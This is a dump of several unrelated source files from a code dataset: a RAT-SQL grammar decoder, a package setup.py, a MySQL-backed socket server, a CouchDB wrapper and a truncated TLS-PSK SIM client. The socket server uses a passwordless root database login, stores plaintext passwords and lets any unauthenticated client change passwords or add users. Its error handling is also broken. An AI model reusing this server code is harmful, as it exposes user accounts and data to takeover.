preterminal_map[goal] = prets\n preterminal_masks[goal] = mask_ids\n preterminal_debug[goal] = set(mask_ids)\n\n # rule to head\n rule_to_head = {}\n parent_to_rule = collections.defaultdict(list)\n head_to_rule = collections.defaultdict(list)\n parent_to_head = collections.defaultdict(list)\n with open(path_to_head_map, 'r') as csv_file:\n elems = csv.reader(csv_file)\n for rule_type, rule, head in elems:\n rule_to_head[rule] = int(head.strip())-1\n if \" -> \" in rule:\n lhs, rhs = rule.split(\" -> \")\n else:\n lhs, rhs = rule.strip().rstrip(\" ->\"), \"\"\n\n if len(rhs):\n split_rhs = [tuple(elem.strip().split(\"/\")) for elem in rhs.split(\",\")]\n parent_to_head[lhs] += [split_rhs[rule_to_head[rule]]]\n head_to_rule[parent_to_head[lhs][-1][0]] += [(lhs, rule)]\n parent_to_rule[lhs] += [[elem.strip() for elem in rhs.split(\",\")]]\n else:\n parent_to_head[lhs] = []\n parent_to_rule[lhs] = []\n\n seq_types = set([lhs for lhs, rhs in rules_index if lhs.endswith(\"*\")])\n for stype in seq_types:\n head = stype.rstrip(\"*\")\n parent_to_head[stype] = [(head, \"NULL\")]\n head_to_rule[head] += [(stype, stype + \" -> \" + head + \"/NULL\")]\n\n # derive head corners for goal nonterminals\n head_corners = {key: set([v[0] for v in value]) for key, value in parent_to_head.items()}\n def dfs(parent, table, visited=set()):\n for head in table[parent]:\n visited.add(parent)\n if head in visited:\n table[parent] = table[parent].union(table[head])\n else:\n dfs(head, table, visited)\n table[parent] = table[parent].union(table[head])\n for key in preterminal_map:\n dfs(key, head_corners)\n\n # now get head corner table -- set of grammar rules available\n # given a head and a goal state\n head_corner_table = {}\n hc_debug = {}\n for goal_state in preterminal_masks:\n head_corner_table[goal_state] = collections.defaultdict(set)\n hc_debug[goal_state] = collections.defaultdict(set)\n for head in head_corners[goal_state]:\n for parent, rule in head_to_rule.get(head):\n if parent in head_corners[goal_state]:\n head_corner_table[goal_state][head].add(rule)\n hc_debug[goal_state][head] = set()\n elif parent == goal_state:\n head_corner_table[goal_state][head].add(rule)\n hc_debug[goal_state][head] = set()\n # given a rule, get the set of indices in rule vocab corresponding to it\n for key_1 in head_corner_table:\n for key_2 in head_corner_table[key_1]:\n mask = []\n for rule in head_corner_table[key_1][key_2]:\n lhs, _ = rule.split(\" ->\")\n mask += get_rule_match_indices(lhs, rule, rules_index)\n head_corner_table[key_1][key_2] = sorted(mask)\n hc_debug[key_1][key_2] = set(mask)\n\n return all_rules, rules_index, preterminal_map, preterminal_masks, preterminal_debug, preterminal_types,\\\n head_corners, head_corner_table, hc_debug, parent_to_head, parent_to_rule\n\n def fetch_head_from_node(self, node):\n parent_type = node[\"_type\"]\n\n name_to_type = {elem[1]: elem[0] for elem in self.parent_to_head[parent_type]}\n for key in node.keys():\n if key != \"_type\":\n if key in name_to_type:\n return key, name_to_type[key]\n return None, []\n\n def construct_oracle_sequence(self, tree_state, oracle_sequence, goal_type=None):\n\n goal_was_false = not goal_type\n\n root_type, node = tree_state\n\n if isinstance(node, list): ## you've hit the child of an aggregator, visit each of the children\n if goal_was_false:\n root_type += \"*\"\n goal_type = root_type\n\n is_sum_type = root_type[:-1] in self.ast_wrapper.sum_types\n\n for i, elem in enumerate(node):\n if i == 0:\n if not is_sum_type:\n 
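# the first list element serves as the head corner, so it inherits the current goal type\n                        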
self.construct_oracle_sequence((None, elem), oracle_sequence, goal_type=goal_type)\n # new here\n else:\n self.construct_oracle_sequence((root_type[:-1], elem), oracle_sequence, goal_type=goal_type)\n # here, check if the parent is a sum type constructor, if so, add an extra expand up\n #if is_sum_type: ### commenting out for now\n # oracle_sequence.append(ExpandUp(rule=(root_type[:-1], elem[\"_type\"]), goal_type=goal_type))\n rule = get_rule_string_from_node(root_type, node, self.ast_wrapper)\n oracle_sequence.append(ExpandUp(rule=rule, goal_type=goal_type))\n else:\n if not is_sum_type:\n self.construct_oracle_sequence((None, elem), oracle_sequence, goal_type=None)\n else:\n self.construct_oracle_sequence((root_type[:-1], elem), oracle_sequence, goal_type=None)\n # here, check if the parent is a sum type constructor, if so, replace match with ExpandUP, then **MATCH**\n #if is_sum_type:\n # ## oracle_sequence[-1] = ExpandUp(rule=(root_type[:-1], elem[\"_type\"]), goal_type=goal_type)\n # oracle_sequence.append(ExpandUp(rule=\"**MATCH**\", goal_type=root_type[:-1]))\n\n if goal_was_false:\n oracle_sequence.append(ExpandUp(rule=\"**MATCH**\", goal_type=goal_type))\n\n elif isinstance(node, dict): ## you're dealing with a Constructor or a ProductType\n\n node_type = node[\"_type\"]\n\n if len(node) == 1:\n try:\n assert goal_was_false\n except:\n print(node)\n raise AssertionError\n\n oracle_sequence.append(PredictPreterminal(ttype=node_type,\n goal_type=root_type))\n oracle_sequence.append(ExpandUp(rule=(root_type, node_type),\n goal_type=root_type))\n oracle_sequence.append(ExpandUp(rule=\"**MATCH**\",\n goal_type=root_type))\n else:\n parent_rule = get_rule_string_from_node(root_type, node, self.ast_wrapper)\n if goal_was_false:\n if parent_rule:\n goal_type = root_type\n else:\n goal_type = node[\"_type\"]\n\n head_field_name, head_field_type = self.fetch_head_from_node(node)\n self.construct_oracle_sequence((head_field_type, node[head_field_name]), oracle_sequence,\n goal_type=goal_type)\n\n # fetch the right rule form for this dict\n type_info = self.ast_wrapper.singular_types[node_type]\n present = get_field_presence_info(self.ast_wrapper, node, type_info.fields)\n rule = (node['_type'], tuple(present))\n oracle_sequence.append(ExpandUp(rule=rule, goal_type=goal_type))\n\n leftover_children = [field for (field, p) in zip(self.ast_wrapper.singular_types[node_type].fields,\n present) if p and field.name != head_field_name]\n\n for child in leftover_children:\n self.construct_oracle_sequence((child.type, node[child.name]), oracle_sequence, goal_type=None)\n\n if parent_rule:\n oracle_sequence.append(ExpandUp(rule=parent_rule, goal_type=goal_type))\n\n # see what happens when you change the position of this\n if goal_was_false:\n if root_type:\n oracle_sequence.append(ExpandUp(rule=\"**MATCH**\", goal_type=root_type))\n else:\n oracle_sequence.append(ExpandUp(rule=\"**MATCH**\", goal_type=node_type))\n\n else:\n # something going on with singletons that we want to fix\n #if root_type not in [\"table\", \"column\"]:\n # root_type = str(type(node))\n if goal_was_false:\n goal_type = root_type\n # predicting a preterminal, pointing to its value. 
match if appropriate.\n oracle_sequence.append(PredictPreterminal(ttype=root_type,\n goal_type=goal_type))\n oracle_sequence.append(Point(ttype=root_type,\n value=node))\n if goal_was_false:\n oracle_sequence.append(ExpandUp(rule=\"**MATCH**\", goal_type=goal_type))\n\n def augment_data_with_oracle(self, zipped_data):\n encoder_data, decoder_data = zip(*zipped_data)\n\n oracle_sequences = []\n for elem in decoder_data:\n oracle_sequence = self.compute_oracle_sequence(elem)\n oracle_sequences.append(oracle_sequence)\n\n return zip(encoder_data, decoder_data, oracle_sequences)\n\n def begin_inference(self, desc_enc, example):\n traversal = InferenceTreeTraversal(self, desc_enc, example)\n choices = traversal.step(None)\n return traversal, choices\n\n def compute_loss(self, enc_input, example, desc_enc, debug):\n mle_loss = self.compute_mle_loss(enc_input, example, desc_enc, debug)\n\n if self.use_align_loss:\n align_loss = self.compute_align_loss(desc_enc, example[0])\n return mle_loss + align_loss\n return mle_loss\n\n def init_state(self, enc_input, example, desc_enc):\n self.goals.append((\"sql\", None))\n self.head_corners = []\n self.operation = self.State.PREDICT_HEAD_CORNER\n\n def compute_mle_loss(self, enc_input, example, desc_enc, debug):\n\n _, oracle = example\n\n # copy this over because pop is destructive\n oracle = oracle[:]\n\n #print(\"##########\")\n #print(json.dumps(example[0].tree, indent=2))\n #print(oracle)\n\n traversal = TrainTreeTraversal(self, desc_enc)\n traversal.step(None)\n while oracle:\n action = oracle.pop(0)\n if isinstance(action, PredictPreterminal):\n index = self.rules_index[(\"\", action.ttype)]\n goal_type = action.goal_type\n assert traversal.current_state == TreeTraversal.State.PRETERMINAL_APPLY\n assert traversal.goals[-1].node_type == goal_type\n try:\n assert index in self.preterminal_debug[goal_type]\n except:\n # print(action)\n raise AssertionError\n traversal.step(index)\n elif isinstance(action, ExpandUp):\n hc = traversal.head_corners[-1]\n if action.rule == \"**MATCH**\":\n index = self.rules_index[(\"\", action.rule)]\n else:\n index = self.rules_index[action.rule]\n # made change here this could be made stricter by giving head corner items goal types\n assert index in self.hc_debug[traversal.goals[-1].node_type][hc.root_type]\n traversal.step(index)\n else: # point\n assert traversal.current_state in [TreeTraversal.State.POINTER_APPLY,\n TreeTraversal.State.GEN_TOKEN_APPLY]\n if action.ttype not in [\"table\", \"column\"]:\n # we're doing conventional pointing (which we handle as strings)\n value = action.value\n field_value_split = self.preproc.grammar.tokenize_field_value(value) + [\n vocab.EOS]\n for value in field_value_split:\n traversal.step(value)\n else:\n pointer_map = desc_enc.pointer_maps.get(action.ttype)\n value = action.value\n\n if pointer_map:\n values = pointer_map[value]\n traversal.step(values[0], values[1:])\n else:\n traversal.step(value)\n\n loss = torch.sum(torch.stack(tuple(traversal.loss), dim=0), dim=0)\n\n hc = traversal.head_corners[-1]\n converted = traversal.convert_head_corner_to_node_rep(hc)\n\n t1 = json.dumps(converted, indent=2, sort_keys=True)\n t2 = json.dumps(example[0].tree, indent=2, sort_keys=True)\n\n # print(t1)\n # print(t2)\n assert t1 == t2\n\n return loss\n\n def compute_loss_from_all_ordering(self, enc_input, example, desc_enc, debug):\n def get_permutations(node):\n def traverse_tree(node):\n nonlocal permutations\n if isinstance(node, (list, tuple)):\n p = 
itertools.permutations(range(len(node)))\n permutations.append(list(p))\n for child in node:\n traverse_tree(child)\n elif isinstance(node, dict):\n for node_name in node:\n traverse_tree(node[node_name])\n\n permutations = []\n traverse_tree(node)\n return permutations\n\n def get_perturbed_tree(node, permutation):\n def traverse_tree(node, parent_type, parent_node):\n if isinstance(node, (list, tuple)):\n nonlocal permutation\n p_node = [node[i] for i in permutation[0]]\n parent_node[parent_type] = p_node\n permutation = permutation[1:]\n for child in node:\n traverse_tree(child, None, None)\n elif isinstance(node, dict):\n for node_name in node:\n traverse_tree(node[node_name], node_name, node)\n\n node = copy.deepcopy(node)\n traverse_tree(node, None, None)\n return node\n\n orig_tree = example.tree\n permutations = get_permutations(orig_tree)\n products = itertools.product(*permutations)\n loss_list = []\n for product in products:\n tree = get_perturbed_tree(orig_tree, product)\n example.tree = tree\n loss = self.compute_mle_loss(enc_input, example, desc_enc)\n loss_list.append(loss)\n example.tree = orig_tree\n loss_v = torch.stack(loss_list, 0)\n return torch.logsumexp(loss_v, 0)\n\n def _desc_attention(self, prev_state, desc_enc):\n # prev_state shape:\n # - h_n: batch (=1) x emb_size\n # - c_n: batch (=1) x emb_size\n query = prev_state[0]\n if self.attn_type != 'sep':\n return self.desc_attn(query, desc_enc.memory, attn_mask=None)\n else:\n question_context, question_attention_logits = self.question_attn(query, desc_enc.question_memory)\n schema_context, schema_attention_logits = self.schema_attn(query, desc_enc.schema_memory)\n return question_context + schema_context, schema_attention_logits\n\n def _tensor(self, data, dtype=None):\n return torch.tensor(data, dtype=dtype, device=self._device)\n\n def _index(self, vocab, word):\n return self._tensor([vocab.index(word)])\n\n def _update_state(\n self,\n node_type,\n prev_state,\n prev_action_emb,\n prec_h,\n prec_action_emb,\n prec_goal,\n desc_enc):\n # desc_context shape: batch (=1) x emb_size\n desc_context, attention_logits = self._desc_attention(prev_state, desc_enc)\n # node_type_emb shape: batch (=1) x emb_size\n node_type_emb = self.node_type_embedding(\n self._index(self.node_type_vocab, node_type))\n\n state_input = torch.cat(\n (\n prev_action_emb, # a_{t-1}: rule_emb_size\n desc_context, # c_t: enc_recurrent_size\n prec_h, # s_{p_t}: recurrent_size\n prec_action_emb, # a_{p_t}: rule_emb_size\n prec_goal, # recurrent_size (goal node) CHANGE MADE HERE\n node_type_emb, # n_{f-t}: node_emb_size\n ),\n dim=-1)\n new_state = self.state_update(\n # state_input shape: batch (=1) x (emb_size * 5)\n state_input, prev_state)\n return new_state, attention_logits\n\n def apply_rule(\n self,\n node_type,\n prev_state,\n prev_action_emb,\n prec_h,\n prec_action_emb,\n prec_goal,\n desc_enc):\n\n new_state, attention_logits = self._update_state(\n node_type, prev_state, prev_action_emb, prec_h, prec_action_emb, prec_goal, desc_enc)\n # output shape: batch (=1) x emb_size\n output = new_state[0]\n # rule_logits shape: batch (=1) x num choices\n rule_logits = self.rule_logits(output)\n\n return output, new_state, rule_logits\n\n def rule_infer(self, node_type, goal_type, rule_logits, state):\n rule_logprobs = torch.nn.functional.log_softmax(rule_logits, dim=-1)\n\n ## changed both from inquire to apply -- shouldn't make a difference?\n if state == TreeTraversal.State.EXPAND_UP_APPLY:\n assert goal_type\n rule_ids = 
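# `compute_loss_from_all_ordering` above perturbs every sibling list with
# itertools.product over per-list permutations and combines per-ordering losses
# with torch.logsumexp. If each loss is a negative log-likelihood, marginalizing
# probability over orderings is -logsumexp(-loss), so the sign convention is
# worth checking (the inner call above also omits the `debug` argument that
# compute_mle_loss declares). A standalone numeric sketch, illustrative values:
import torch

nlls = torch.tensor([1.2, 0.7, 2.3])           # -log p(tree, ordering_i)
marginal_nll = -torch.logsumexp(-nlls, dim=0)  # -log sum_i p(tree, ordering_i)
assert marginal_nll <= nlls.min()              # marginal is at least as likely as the best ordering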
self.hc_table[goal_type][node_type]\n if goal_type == node_type:\n rule_ids = rule_ids.union(set([self.rules_index[(\"\", \"**MATCH**\")]]))\n rule_ids = sorted(list(rule_ids))\n elif state == TreeTraversal.State.PRETERMINAL_APPLY:\n rule_ids = self.preterminal_mask[node_type]\n else:\n print(\"Rule infer should only be evoked for expand up and predict preterminal.\")\n raise NotImplementedError\n\n return list(zip(rule_ids, [rule_logprobs[0, idx] for idx in rule_ids]))\n\n\n def gen_token(\n self,\n node_type,\n prev_state,\n prev_action_emb,\n prec_h,\n prec_action_emb,\n goal_h,\n desc_enc):\n\n new_state, attention_logits = self._update_state(\n node_type, prev_state, prev_action_emb, prec_h, prec_action_emb, goal_h, desc_enc)\n # output shape: batch (=1) x emb_size\n output = new_state[0]\n\n # gen_logodds shape: batch (=1)\n gen_logodds = self.gen_logodds(output).squeeze(1)\n\n return new_state, output, gen_logodds\n\n def gen_token_loss(\n self,\n output,\n gen_logodds,\n token,\n desc_enc):\n # token_idx shape: batch (=1), LongTensor\n token_idx = self._index(self.terminal_vocab, token)\n # action_emb shape: batch (=1) x emb_size\n action_emb = self.terminal_embedding(token_idx)\n\n # +unk, +in desc: copy\n # +unk, -in desc: gen (an unk token)\n # -unk, +in desc: copy, gen\n # -unk, -in desc: gen\n # gen_logodds shape: batch (=1)\n desc_locs = desc_enc.find_word_occurrences(token)\n if desc_locs:\n # copy: if the token appears in the description at least once\n # copy_loc_logits shape: batch (=1) x desc length\n copy_loc_logits = self.copy_pointer(output, desc_enc.memory)\n copy_logprob = (\n # log p(copy | output)\n # shape: batch (=1)\n torch.nn.functional.logsigmoid(-gen_logodds) -\n # xent_loss: -log p(location | output)\n # TODO: sum the probability of all occurrences\n # shape: batch (=1)\n self.xent_loss(copy_loc_logits, self._tensor(desc_locs[0:1])))\n else:\n copy_logprob = None\n\n # gen: ~(unk & in desc), equivalent to ~unk | ~in desc\n if token in self.terminal_vocab or copy_logprob is None:\n token_logits = self.terminal_logits(output)\n # shape:\n gen_logprob = (\n # log p(gen | output)\n # shape: batch (=1)\n torch.nn.functional.logsigmoid(gen_logodds) -\n # xent_loss: -log p(token | output)\n # shape: batch (=1)\n self.xent_loss(token_logits, token_idx))\n else:\n gen_logprob = None\n\n # loss should be -log p(...), so negate\n loss_piece = -torch.logsumexp(\n maybe_stack([copy_logprob, gen_logprob], dim=1),\n dim=1)\n return loss_piece\n\n def token_infer(self, output, gen_logodds, desc_enc):\n # Copy tokens\n # log p(copy | output)\n # shape: batch (=1)\n copy_logprob = torch.nn.functional.logsigmoid(-gen_logodds)\n copy_loc_logits = self.copy_pointer(output, desc_enc.memory)\n # log p(loc_i | copy, output)\n # shape: batch (=1) x seq length\n copy_loc_logprobs = torch.nn.functional.log_softmax(copy_loc_logits, dim=-1)\n # log p(loc_i, copy | output)\n copy_loc_logprobs += copy_logprob\n\n log_prob_by_word = {}\n # accumulate_logprobs is needed because the same word may appear\n # multiple times in desc_enc.words.\n accumulate_logprobs(\n log_prob_by_word,\n zip(desc_enc.words, copy_loc_logprobs.squeeze(0)))\n\n # Generate tokens\n # log p(~copy | output)\n # shape: batch (=1)\n gen_logprob = torch.nn.functional.logsigmoid(gen_logodds)\n token_logits = self.terminal_logits(output)\n # log p(v | ~copy, output)\n # shape: batch (=1) x vocab size\n token_logprobs = torch.nn.functional.log_softmax(token_logits, dim=-1)\n # log p(v, ~copy| output)\n # shape: batch (=1) 
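# gen_token_loss above scores a token as a two-way mixture,
# p(token) = p(copy) * p(location | copy) + p(gen) * p(token | gen),
# using logsigmoid(-gen_logodds) / logsigmoid(gen_logodds) for the gate and a
# logsumexp (via maybe_stack) for the log-space sum. A standalone numeric sketch
# of that combination with made-up component probabilities:
import torch
import torch.nn.functional as F

gen_logodds = torch.tensor([0.4])
log_copy = F.logsigmoid(-gen_logodds) + torch.log(torch.tensor([0.25]))  # log p(copy) + log p(loc|copy)
log_gen = F.logsigmoid(gen_logodds) + torch.log(torch.tensor([0.10]))    # log p(gen) + log p(token|gen)
loss_piece = -torch.logsumexp(torch.stack([log_copy, log_gen], dim=1), dim=1)
print(float(loss_piece))  # -log(0.401*0.25 + 0.599*0.10) ~= 1.83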
x vocab size\n token_logprobs += gen_logprob\n\n accumulate_logprobs(\n log_prob_by_word,\n ((self.terminal_vocab[idx], token_logprobs[0, idx]) for idx in range(token_logprobs.shape[1])))\n\n return list(log_prob_by_word.items())\n\n def compute_pointer(\n self,\n node_type,\n prev_state,\n prev_action_emb,\n parent_h,\n parent_action_emb,\n desc_enc):\n new_state, attention_logits = self._update_state(\n node_type, prev_state, prev_action_emb, parent_h, parent_action_emb, desc_enc)\n # output shape: batch (=1) x emb_size\n output = new_state[0]\n # pointer_logits shape: batch (=1) x num choices\n pointer_logits = self.pointers[node_type](\n output, desc_enc.pointer_memories[node_type])\n\n return output, new_state, pointer_logits, attention_logits\n\n def pointer_infer(self, node_type, logits):\n logprobs = torch.nn.functional.log_softmax(logits, dim=-1)\n return list(zip(\n # TODO batching\n range(logits.shape[1]),\n logprobs[0]))","sub_path":"ratsql/models/head_corner/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":39595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"61145079","text":"import os\nfrom setuptools import setup, find_packages\n\nBASEDIR = os.path.dirname(os.path.abspath(__file__))\nVERSION = open(os.path.join(BASEDIR, 'VERSION')).read().strip()\n\nBASE_DEPENDENCIES = [\n 'wf-database-connection-honeycomb>=0.2.1',\n 'bluepy>=1.3.0',\n 'click>=7.0'\n]\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(BASEDIR))\n\nsetup(\n name='wf-shoe-sensor',\n packages=find_packages(),\n version=VERSION,\n include_package_data=True,\n description='Python package for communicating with Wildflower shoe sensors through BLE interface',\n long_description=open('README.md').read(),\n url='https://github.com/WildflowerSchools/shoe_sensor',\n author='Theodore Quinn',\n author_email='ted.quinn@wildflowerschools.org',\n install_requires=BASE_DEPENDENCIES,\n keywords=['bluetooth'],\n classifiers=[\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python',\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"17890509","text":"#!/usr/bin/python\n\nimport os\nimport socket\nimport sys\nimport glob\nimport select\nimport mysql.connector\nimport re\n\t\t\nconfig = {\n'user': 'root',\n'password': '',\n'host': '127.0.0.1',\n'port': '3306',\n'database': 'maison',\n'raise_on_warnings': True,}\n\ndef decodeTrame(encode):\n\treponse = \"null\"\n\tconn = mysql.connector.connect(**config)\n\tcursor = conn.cursor()\n\tencode = re.split('\\n', encode)\n\tif(encode[0] == '1'): # RECHERCHE UTILISATEUR\n\t\tcursor.execute(\"\"\"SELECT NIV FROM utilisateur WHERE NOM=%s AND MDP=%s\"\"\", (encode[1], encode[2], ))\n\t\trows = cursor.fetchall()\n\t\tconn.close()\n\t\tnum = list(sum(rows, ()))\n\t\tif(rows != None):\n\t\t\treponse = num[0]\n\t\t\treturn str(reponse).encode()\n\tif(encode[0] == '2'): # NOMBRE PIECES\n\t\tcursor.execute(\"SELECT COUNT(*) FROM pieces\")\n\t\trows = cursor.fetchall()\n\t\tconn.close()\n\t\tnum = list(sum(rows, ()))\n\t\tif(rows != None):\n\t\t\treponse = num[0]\n\t\t\treturn str(reponse).encode()\n\tif(encode[0] == '3'): # TOUTE LES PIECES\n\t\tcursor.execute(\"SELECT NOM FROM pieces\")\n\t\trows = cursor.fetchall()\n\t\tconn.close()\n\t\tnum = 
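# `accumulate_logprobs`, used by token_infer above, is not defined in this
# excerpt. A plausible sketch consistent with its call sites -- a dict plus
# (word, logprob) pairs where repeated words must have their probabilities
# summed -- is the logaddexp accumulation below (an assumption, not the
# project's actual helper):
import torch

def accumulate_logprobs(table, keys_and_logprobs):
    for key, logprob in keys_and_logprobs:
        existing = table.get(key)
        # log(p_old + p_new) for duplicate keys; first occurrence stored as-is
        table[key] = logprob if existing is None else torch.logaddexp(existing, logprob)

table = {}
accumulate_logprobs(table, [("the", torch.tensor(-1.0)), ("the", torch.tensor(-2.0))])
expected = torch.log(torch.exp(torch.tensor(-1.0)) + torch.exp(torch.tensor(-2.0)))
assert torch.isclose(table["the"], expected)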
list(sum(rows, ()))\n\t\treponse = \"\"\n\t\tfor row in num:\n\t\t\treponse += row + '\\n'\n\t\tif(rows != None):\n\t\t\treturn reponse.encode()\n\tif(encode[0] == '4'): # NOMBRE COMPOSANT\n\t\tcursor.execute(\"\"\"SELECT COUNT(*) FROM composant WHERE PIECE=%s\"\"\", (encode[1], ))\n\t\trows = cursor.fetchall()\n\t\tconn.close()\n\t\tnum = list(sum(rows, ()))\n\t\tif(rows != None):\n\t\t\treponse = num[0]\n\t\t\treturn str(reponse).encode()\n\tif(encode[0] == '5'): # TOUS LES COMPOSANT\n\t\tcursor.execute(\"\"\"SELECT NOM, GA, NIV FROM composant WHERE PIECE=%s\"\"\", (encode[1], ))\n\t\trows = cursor.fetchall()\n\t\tconn.close()\n\t\tnum = list(sum(rows, ()))\n\t\treponse = \"\"\n\t\tfor row in num:\n\t\t\treponse += str(row) + '\\n'\n\t\tprint(reponse)\n\t\tif(rows != None):\n\t\t\treturn reponse.encode()\n\tif(encode[0] == '6'): # MODIFICATION MDP UTILISATEUR\n\t\ttry:\n\t\t\tcursor.execute(\"\"\"UPDATE utilisateur SET MDP=%s WHERE NOM=%s\"\"\", (encode[2], encode[1], ))\n\t\t\treponse = \"1\"\n\t\texcept (MySQLdb.Error, MySQLdb.Warning) as e:\n\t\t\treponse = \"0\"\n\t\tconn.close()\n\tif(encode[0] == '7'): # MODIFICATION MDP & NIV UTILISATEUR\n\t\ttry:\n\t\t\tcursor.execute(\"\"\"UPDATE utilisateur SET MDP=%s, NIV=%s WHERE NOM=%s\"\"\", (encode[2], encode[3], encode[1], ))\n\t\t\treponse = \"1\"\n\t\texcept (MySQLdb.Error, MySQLdb.Warning) as e:\n\t\t\treponse = \"0\"\n\t\tconn.close()\n\tif(encode[0] == '8'): # RECHERCHE NIV UTILISATEUR\n\t\ttry:\n\t\t\tcursor.execute(\"\"\"UPDATE utilisateur SET NIV=%s WHERE NOM=%s\"\"\", (encode[2], encode[1], ))\n\t\t\treponse = \"1\"\n\t\texcept (MySQLdb.Error, MySQLdb.Warning) as e:\n\t\t\treponse = \"0\"\n\t\tconn.close()\n\tif(encode[0] == '9'): # AJOUT UTILISATEUR\n\t\ttry:\n\t\t\tcursor.execute(\"\"\"INSERT INTO utilisateur (NOM, MDP, NIV) VALUES (%s, %s, %s)\"\"\", (encode[1], encode[2], encode[3], ))\n\t\t\treponse = \"1\"\n\t\texcept (MySQLdb.Error, MySQLdb.Warning) as e:\n\t\t\treponse = \"0\"\n\t\tconn.close()\n\tif(encode[0] == '10'): # DEJA USER\n\t\tcursor.execute(\"\"\"SELECT ID FROM utilisateur WHERE NOM=%s\"\"\", (encode[1], ))\n\t\trows = cursor.fetchall()\n\t\tconn.close()\n\t\tnum = list(sum(rows, ()))\n\t\treponse = \"\"\n\t\tfor row in num:\n\t\t\treponse += str(row) + '\\n'\n\t\tprint(reponse)\n\t\tif(rows != None):\n\t\t\treturn reponse.encode()\n\treturn reponse.encode()\n\nhote = 'localhost' # 192.168.1.104\nport = 3176\nconnexion_principale = None\nconnexion_principale = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nconnexion_principale.bind((hote, port))\nconnexion_principale.listen(3) #nombre de connexion simultané\nprint(\"Le serveur ecoute {}\".format(port))\nwhile 1:\n serveur_lance = True\n print(\"\\t\\t+++++ DEBUT +++++\")\n clients_connectes = []\n while serveur_lance:\n connexions_demandees, wlist, xlist = select.select([connexion_principale],[], [], 0.05)\n for connexion in connexions_demandees:\n connexion_avec_client, infos_connexion = connexion.accept()\n clients_connectes.append(connexion_avec_client)\n clients_a_lire = []\n try:\n clients_a_lire, wlist, xlist = select.select(clients_connectes,[], [], 0.05)\n except select.error:\n pass\n else:\n for client in clients_a_lire:\n # Client est de type socket\n msg_recu = client.recv(2048)\n msg_recu = msg_recu.decode()\n print(\"Recu -> {0}\".format(msg_recu) + \"\\tDepuis -> {0}\".format(infos_connexion))\n client.send(decodeTrame(msg_recu))\n serveur_lance = False\n client.close()\n print(\"Communication fini avec success...\")\n print(\"\\t\\t+++++ END 
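# The UPDATE/INSERT branches above catch (MySQLdb.Error, MySQLdb.Warning), but
# this script imports mysql.connector, not MySQLdb, so the except clause itself
# raises NameError the first time a query fails; the writes are also never
# committed, so they are lost when conn.close() runs. A corrected sketch of one
# branch under the same schema assumptions (table utilisateur, columns NOM/MDP):
import mysql.connector

def update_password(config, nom, mdp):
    conn = mysql.connector.connect(**config)
    try:
        cursor = conn.cursor()
        cursor.execute("UPDATE utilisateur SET MDP=%s WHERE NOM=%s", (mdp, nom))
        conn.commit()   # required: uncommitted writes roll back on close
        return "1"
    except mysql.connector.Error:
        return "0"
    finally:
        conn.close()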
+++++\")\nfor client in clients_connectes:\n client.close()\nconnexion_principale.close()\n","sub_path":"Serveur/serveur.py","file_name":"serveur.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"298522878","text":"from .designdocs import (\n db_model_token,\n db_definition,\n db_data,\n db_data_item,\n)\n\n\nclass Database(object):\n \"\"\"Object handling all the connections to the couchdb server.\"\"\"\n\n def __init__(self, db):\n self.db = db\n self.save = db.save\n\n def get_definition(self, model_name):\n \"\"\"Get the scheme definition from the model_name.\n\n :param model_name: the name of the definition you want to retrieve\n\n \"\"\"\n results = db_definition(self.db)[model_name]\n for result in results:\n return result.value\n\n def get_definition_token(self, model_name):\n \"\"\"Return the token associated with a definition.\n\n :param model_name: the name of the definition you want to retrieve\n\n \"\"\"\n return db_model_token(self.db)[model_name]\n\n def get_data(self, model_name):\n \"\"\"Get the definition of the model data.\n\n :param model_name: the name of the definition you want to retrieve\n\n \"\"\"\n return db_data(self.db)[model_name]\n\n def get_data_item(self, model_name, data_item_id):\n \"\"\"Get a data-item and checks it behaves to the requested model\"\"\"\n key = [str(data_item_id), str(model_name)]\n data_items = db_data_item(self.db)[key]\n if len(data_items):\n data_item = data_items.rows[0]\n return data_item\n return None\n\n def create_data(self, model_name, data, data_id=None):\n \"\"\"Create a data to a model_name.\"\"\"\n if data_id:\n data_doc = self.db[data_id]\n data_id = data_doc.id\n else:\n data_doc = {\n 'type': 'data',\n 'model_name': model_name,\n }\n data_doc['data'] = data\n\n if data_id:\n self.db[data_id] = data_doc\n else:\n data_id, rev = self.db.save(data_doc)\n\n return data_id\n","sub_path":"daybed/backends/couchdb/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"357765417","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2020-2021 Pod Group Ltd.\n#\n# Authors:\n# - Kostiantyn Chertov <kostiantyn.chertov@podgroup.com>\n# - J. Félix Ontañón <felix.ontanon@podgroup.com>\n\nimport socket\nimport time\nfrom tlspsk import TLSClientSession\n\nfrom enosim.logger import logger\nfrom enosim.iccid import iccid2bin\n\n\ndef __tlssession(server, port, sim_key, sim_iccid, request):\n quit = False\n sock = None\n\n def callback(data):\n nonlocal quit, sock\n logger.info(data)\n if data == b\"bye\\n\":\n quit = True\n\n psk = bytes.fromhex(sim_key)\n session = TLSClientSession(\n server_names=server, psk=psk, psk_label=bytes.fromhex(sim_iccid), data_callback=callback, psk_only=True\n )\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((server, port))\n client_hello = session.pack_client_hello()\n logger.debug('client hello: {0}'.format(client_hello.hex()))\n sock.sendall(client_hello)\n\n parser = session.parser()\n step = 0\n logger.info('TLS1.3-PSK session established. 
